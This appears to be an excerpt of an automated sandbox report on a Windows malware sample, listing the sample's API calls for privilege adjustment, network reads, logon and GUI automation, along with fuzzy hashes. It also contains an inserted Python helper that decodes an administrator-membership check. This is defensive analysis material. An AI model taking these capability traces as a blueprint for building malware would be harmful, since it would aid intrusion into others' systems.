                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2576544623-0
                                                                                                                            • Opcode ID: 8c93ba888c4d35448de5496fe2c3433d70e5fffc95d7ccb0c53d1742d75b186b
                                                                                                                            • Instruction ID: 7aae6b35014811c809e256ef67713b65ebc52122f388435d8e74599c7ed4b2c4
                                                                                                                            • Opcode Fuzzy Hash: 8c93ba888c4d35448de5496fe2c3433d70e5fffc95d7ccb0c53d1742d75b186b
                                                                                                                            • Instruction Fuzzy Hash: 425191715083499FD314EF25DC82E6BB7E8EF94750F00582DF995972A2EB70AD08CB92
                                                                                                                            APIs
                                                                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00F3E628
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen
                                                                                                                            • String ID: ($|
                                                                                                                            • API String ID: 1659193697-1631851259
                                                                                                                            • Opcode ID: f6eba11d2e4d3d07023172d95b28322f12a9a569668ae4bda319e13577414d0e
                                                                                                                            • Instruction ID: e66d5b6d405da2c0c569b609202050336b050b9f5f292601064ceae7eb035c66
                                                                                                                            • Opcode Fuzzy Hash: f6eba11d2e4d3d07023172d95b28322f12a9a569668ae4bda319e13577414d0e
                                                                                                                            • Instruction Fuzzy Hash: 67321475A00605DFDB28CF19C481AAAB7F1FF48320B15C56EE89ADB3A1DB70E941DB40
                                                                                                                            APIs
                                                                                                                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00F5180A,00000000), ref: 00F523E1
                                                                                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00F52418
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 599397726-0
                                                                                                                            • Opcode ID: 28e70025442e31ffe12ff2a3fa9b02d13fa946fd536268027a72fc0b6eabf0d5
                                                                                                                            • Instruction ID: 729d5256ecf91468e4c0bccaf737fe05b99f86925dc87d831ee6a7c1e03dbc90
                                                                                                                            • Opcode Fuzzy Hash: 28e70025442e31ffe12ff2a3fa9b02d13fa946fd536268027a72fc0b6eabf0d5
                                                                                                                            • Instruction Fuzzy Hash: E841F672904209BFEB50DE95DC81FBF77ACEB42326F10412AFF01A6141DA749E49B660
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00F4B40B
                                                                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00F4B465
                                                                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00F4B4B2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1682464887-0
                                                                                                                            • Opcode ID: 6000d238f3828c4773ebfb2bfef433208b2e3970274ce7439d60c24cc7ddac3c
                                                                                                                            • Instruction ID: a1907a77b0c1e95af816611f0b8eb44fed888a89139b93f25de376d2f7e16547
                                                                                                                            • Opcode Fuzzy Hash: 6000d238f3828c4773ebfb2bfef433208b2e3970274ce7439d60c24cc7ddac3c
                                                                                                                            • Instruction Fuzzy Hash: AF213275A0010CEFCB00EFA5D884AEDBBF8FF49314F1480AAE905AB362DB319955DB55
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F00DB6: std::exception::exception.LIBCMT ref: 00F00DEC
                                                                                                                              • Part of subcall function 00F00DB6: __CxxThrowException@8.LIBCMT ref: 00F00E01
                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F3882B
                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F38858
                                                                                                                            • GetLastError.KERNEL32 ref: 00F38865
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1922334811-0
                                                                                                                            • Opcode ID: 345d22ff738928ff2ab999c6b306898e374a9a04253ddab175687573e4eaeebc
                                                                                                                            • Instruction ID: df388ca0f8ebe65fdff1bad2c19c8addaa4b7669ecb18756527c1e19fcf7658d
                                                                                                                            • Opcode Fuzzy Hash: 345d22ff738928ff2ab999c6b306898e374a9a04253ddab175687573e4eaeebc
                                                                                                                            • Instruction Fuzzy Hash: 8D118FB2814305AFE718DFA4EC85D6BB7F8EB44760B20852EF45597241EF74BC419B60
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00F38774
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F3878B
• FreeSid.ADVAPI32(?), ref: 00F3879B
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
• Opcode ID: 6200a16c98227232fec19bab57f21a19fa0dbb0376768ca04befe8db2910c819
• Instruction ID: 0eacd9b0052dd077a122f720b551b98a6f7d8698a23a98793e736b56e831a74e
• Opcode Fuzzy Hash: 6200a16c98227232fec19bab57f21a19fa0dbb0376768ca04befe8db2910c819
• Instruction Fuzzy Hash: B0F04975A1130CBFDF00DFF4DD89AAEBBBCEF08311F1044A9E911E2281E6756A089B50
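The three calls recorded for this function (AllocateAndInitializeSid with sub-authorities 0x20 and 0x220, then CheckTokenMembership, then FreeSid) are the documented Windows idiom for asking whether the calling token already carries the BUILTIN\Administrators group; it is a query, not an elevation. The Python below is an added example, not code from the report or from the sample: it parses the API line exactly as the IDA plugin prints it and rebuilds the SID that is being tested. The identifier-authority argument is unresolved in the dump (shown as "?"), so the example assumes SECURITY_NT_AUTHORITY (5), which is the authority the 0x20/0x220 RIDs belong to; the function names and the small WELL_KNOWN_SIDS table are the example's own.

```python
"""
Added example: rebuild the SID tested by an AllocateAndInitializeSid /
CheckTokenMembership pair from the argument list printed by the Joe Sandbox
IDA plugin.  RID constants are Windows SDK values; SECURITY_NT_AUTHORITY is
an assumption because the authority pointer is unresolved ("?") in the dump.
"""
from typing import Dict, List, Optional

SECURITY_NT_AUTHORITY = 5            # S-1-5-...  (assumed for this dump)
SECURITY_BUILTIN_DOMAIN_RID = 0x20   # 32
DOMAIN_ALIAS_RID_ADMINS = 0x220      # 544

# Readable names for the SIDs this example needs; not a complete table.
WELL_KNOWN_SIDS: Dict[str, str] = {
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-545": "BUILTIN\\Users",
}


def parse_ida_args(line: str) -> List[Optional[int]]:
    """Parse the parenthesised argument list of an IDA-plugin API line.
    Hex words become ints; unresolved arguments ('?') become None."""
    start = line.index("(") + 1
    end = line.index(")", start)
    args: List[Optional[int]] = []
    for tok in line[start:end].split(","):
        tok = tok.strip()
        args.append(None if tok == "?" else int(tok, 16))
    return args


def sid_from_allocate_args(args: List[Optional[int]],
                           authority: int = SECURITY_NT_AUTHORITY) -> str:
    """AllocateAndInitializeSid(pIdentifierAuthority, nSubAuthorityCount,
    dwSubAuthority0..7, pSid): rebuild 'S-1-<authority>-<sub>-...'.
    The authority pointer cannot be dereferenced from a static dump, so the
    caller passes the assumed authority value."""
    if len(args) != 11:
        raise ValueError("AllocateAndInitializeSid takes 11 arguments")
    count = args[1]
    if count is None or not 1 <= count <= 8:
        raise ValueError("nSubAuthorityCount must be 1..8")
    subs = args[2:2 + count]
    if any(s is None for s in subs):
        raise ValueError("unresolved sub-authority in dump")
    return "S-1-%d-%s" % (authority, "-".join(str(s) for s in subs))


def describe_sid_check(line: str) -> Dict[str, str]:
    """Return the SID and its well-known name for one API line."""
    sid = sid_from_allocate_args(parse_ida_args(line))
    return {"sid": sid, "name": WELL_KNOWN_SIDS.get(sid, "unknown")}


def is_admin_membership_check(line: str) -> bool:
    """True when the SID built is BUILTIN\\Administrators, i.e. the
    AllocateAndInitializeSid / CheckTokenMembership / FreeSid idiom that
    asks 'does my token already carry the Administrators group?'."""
    return describe_sid_check(line)["sid"] == "S-1-5-32-544"


# The API line as printed in this report for the function above (copied
# from the listing, not captured live).
REPORT_LINE = ("AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,"
               "00000000,00000000,00000000,00000000,00000000,00000000,?), "
               "ref: 00F38774")

if __name__ == "__main__":
    print(describe_sid_check(REPORT_LINE))
```

CheckTokenMembership with a NULL token handle evaluates the calling thread's impersonation token, or the process primary token if there is none, so the result only tells the sample whether it is already running as an administrator. In triage this function should be tagged as an is-admin check feeding a later branch, not as a privilege-escalation step in itself.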
APIs
• mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00F44CB3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: mouse_event
• String ID: DOWN
• API String ID: 2434400541-711622031
• Opcode ID: 291194139a1eabaa11c534397ad59f5980be731f31b8a0e0f6afced53e0ec350
• Instruction ID: 90e4471c75b392040e3b695045684b21d1d967de89678f3a576e28883c559d70
• Opcode Fuzzy Hash: 291194139a1eabaa11c534397ad59f5980be731f31b8a0e0f6afced53e0ec350
• Instruction Fuzzy Hash: 17E0462229D72138F9842A28FC06FB72A8C8B22335B140206FD14E54C1EE847C8234BA
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00F4C6FB
• FindClose.KERNEL32(00000000), ref: 00F4C72B
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: 9f0937b021dfccc5dbf99cac07ee819e86f36277a4efb72bb5fb1c21b54458cc
• Instruction ID: 438a4a0c639ea4c8a61b1b10a94a9c48ba2db232e0c4992b2d59c2266459255e
• Opcode Fuzzy Hash: 9f0937b021dfccc5dbf99cac07ee819e86f36277a4efb72bb5fb1c21b54458cc
• Instruction Fuzzy Hash: 2A11A1726002049FDB10DF29D845A2AF7E8FF85324F00851EF8A9D72A1DB70AC05DF81
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00F59468,?,00F6FB84,?), ref: 00F4A097
• FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00F59468,?,00F6FB84,?), ref: 00F4A0A9
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
• Opcode ID: 278d1176f9030bbd9434039bb8e2bba39d00779a8b0594fb806c8a37610741b2
• Instruction ID: 4e7337317e455e957e18f44f4feb7776238e728cfcd7f989ca1b9b4be186ff88
• Opcode Fuzzy Hash: 278d1176f9030bbd9434039bb8e2bba39d00779a8b0594fb806c8a37610741b2
• Instruction Fuzzy Hash: FCF0273654422DBBDB209FA4DC48FEA776CFF08361F004265FD18D3180D6709944DBA1
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F38309), ref: 00F381E0
• CloseHandle.KERNEL32(?,?,00F38309), ref: 00F381F2
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
• Opcode ID: a57c55daadbce7bcaff01be0ec871fd25a9c89331c28bd547a5e2ad16b6c8ca9
• Instruction ID: 47343def59be027ba7e54c96b29b02e4240e9c16676850c77e2b656710f38a5c
• Opcode Fuzzy Hash: a57c55daadbce7bcaff01be0ec871fd25a9c89331c28bd547a5e2ad16b6c8ca9
• Instruction Fuzzy Hash: FFE0EC72014611AFE7252B60FC09E777BEAEF04360B24882DF8A684470DB66AC91FB10
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,00F08D57,?,?,?,00000001), ref: 00F0A15A
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00F0A163
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 85239e0854a08da84e2d35a1533e334105a92e5fac3313ed3b46a8f3fab9dbf4
• Instruction ID: 34febaf63c8de296c5c2f863d2d465cf02f4b0323e9098fddd618e98d46ffe81
• Opcode Fuzzy Hash: 85239e0854a08da84e2d35a1533e334105a92e5fac3313ed3b46a8f3fab9dbf4
• Instruction Fuzzy Hash: 05B0923105820CABCA002B91FC0AB883F68EB44AA2F404020F61D84262EBA25454AA91
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f72ca9ac58f87e3945d516926e767231ab518f2a49e34ebbc416ddcba43deeed
• Instruction ID: 0b925cd1a5fab72f98db518936d75d57f97d593b4fe24efbd01a2e80d5650d58
• Opcode Fuzzy Hash: f72ca9ac58f87e3945d516926e767231ab518f2a49e34ebbc416ddcba43deeed
• Instruction Fuzzy Hash: 0C32E222D29F054DD7239638DC62335A289AFB73D4F15D737E81AB5DAAEB28C4C36101
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 716e3faa98484710214b60d8c5760e7b2fe4c406faac6f92ba2937fb94860ea4
• Instruction ID: 90a48a8af8fa2b34d8c43a8aee06f64fbd9885acebfa5d205279cb9b92931af5
• Opcode Fuzzy Hash: 716e3faa98484710214b60d8c5760e7b2fe4c406faac6f92ba2937fb94860ea4
• Instruction Fuzzy Hash: 12B1F120D2AF444DD2639A388875336B65CAFFB2D5F52D71BFC1A74D22EB2281C35142
                                                                                                                            APIs
                                                                                                                            • __time64.LIBCMT ref: 00F4889B
                                                                                                                              • Part of subcall function 00F0520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00F48F6E,00000000,?,?,?,?,00F4911F,00000000,?), ref: 00F05213
                                                                                                                              • Part of subcall function 00F0520A: __aulldiv.LIBCMT ref: 00F05233
                                                                                                                            Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Time$FileSystem__aulldiv__time64
• String ID:
• API String ID: 2893107130-0
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00F38389), ref: 00F387D1
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 00F0A12A
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
APIs
• DeleteObject.GDI32(00000000), ref: 00F5785B
• DeleteObject.GDI32(00000000), ref: 00F5786D
• DestroyWindow.USER32 ref: 00F5787B
• GetDesktopWindow.USER32 ref: 00F57895
• GetWindowRect.USER32(00000000), ref: 00F5789C
• SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00F579DD
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00F579ED
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F57A35
• GetClientRect.USER32(00000000,?), ref: 00F57A41
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00F57A7B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F57A9D
• GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F57AB0
• GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F57ABB
• GlobalLock.KERNEL32(00000000), ref: 00F57AC4
• ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F57AD3
• GlobalUnlock.KERNEL32(00000000), ref: 00F57ADC
• CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F57AE3
• GlobalFree.KERNEL32(00000000), ref: 00F57AEE
• CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F57B00
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00F72CAC,00000000), ref: 00F57B16
• GlobalFree.KERNEL32(00000000), ref: 00F57B26
• CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00F57B4C
• SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00F57B6B
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F57B8D
• ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F57D7A
Strings
Similarity
• API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
• String ID: $AutoIt v3$DISPLAY$static
• API String ID: 2211948467-2373415609
APIs
• CharUpperBuffW.USER32(?,?,00F6F910), ref: 00F63627
• IsWindowVisible.USER32(?), ref: 00F6364B
Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: BuffCharUpperVisibleWindow
                                                                                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                            • API String ID: 4105515805-45149045
APIs
• SetTextColor.GDI32(?,00000000), ref: 00F6A630
• GetSysColorBrush.USER32(0000000F), ref: 00F6A661
• GetSysColor.USER32(0000000F), ref: 00F6A66D
• SetBkColor.GDI32(?,000000FF), ref: 00F6A687
• SelectObject.GDI32(?,00000000), ref: 00F6A696
• InflateRect.USER32(?,000000FF,000000FF), ref: 00F6A6C1
• GetSysColor.USER32(00000010), ref: 00F6A6C9
• CreateSolidBrush.GDI32(00000000), ref: 00F6A6D0
• FrameRect.USER32(?,?,00000000), ref: 00F6A6DF
• DeleteObject.GDI32(00000000), ref: 00F6A6E6
• InflateRect.USER32(?,000000FE,000000FE), ref: 00F6A731
• FillRect.USER32(?,?,00000000), ref: 00F6A763
• GetWindowLongW.USER32(?,000000F0), ref: 00F6A78E
  • Part of subcall function 00F6A8CA: GetSysColor.USER32(00000012), ref: 00F6A903
  • Part of subcall function 00F6A8CA: SetTextColor.GDI32(?,?), ref: 00F6A907
  • Part of subcall function 00F6A8CA: GetSysColorBrush.USER32(0000000F), ref: 00F6A91D
  • Part of subcall function 00F6A8CA: GetSysColor.USER32(0000000F), ref: 00F6A928
  • Part of subcall function 00F6A8CA: GetSysColor.USER32(00000011), ref: 00F6A945
  • Part of subcall function 00F6A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F6A953
  • Part of subcall function 00F6A8CA: SelectObject.GDI32(?,00000000), ref: 00F6A964
  • Part of subcall function 00F6A8CA: SetBkColor.GDI32(?,00000000), ref: 00F6A96D
  • Part of subcall function 00F6A8CA: SelectObject.GDI32(?,?), ref: 00F6A97A
  • Part of subcall function 00F6A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00F6A999
  • Part of subcall function 00F6A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F6A9B0
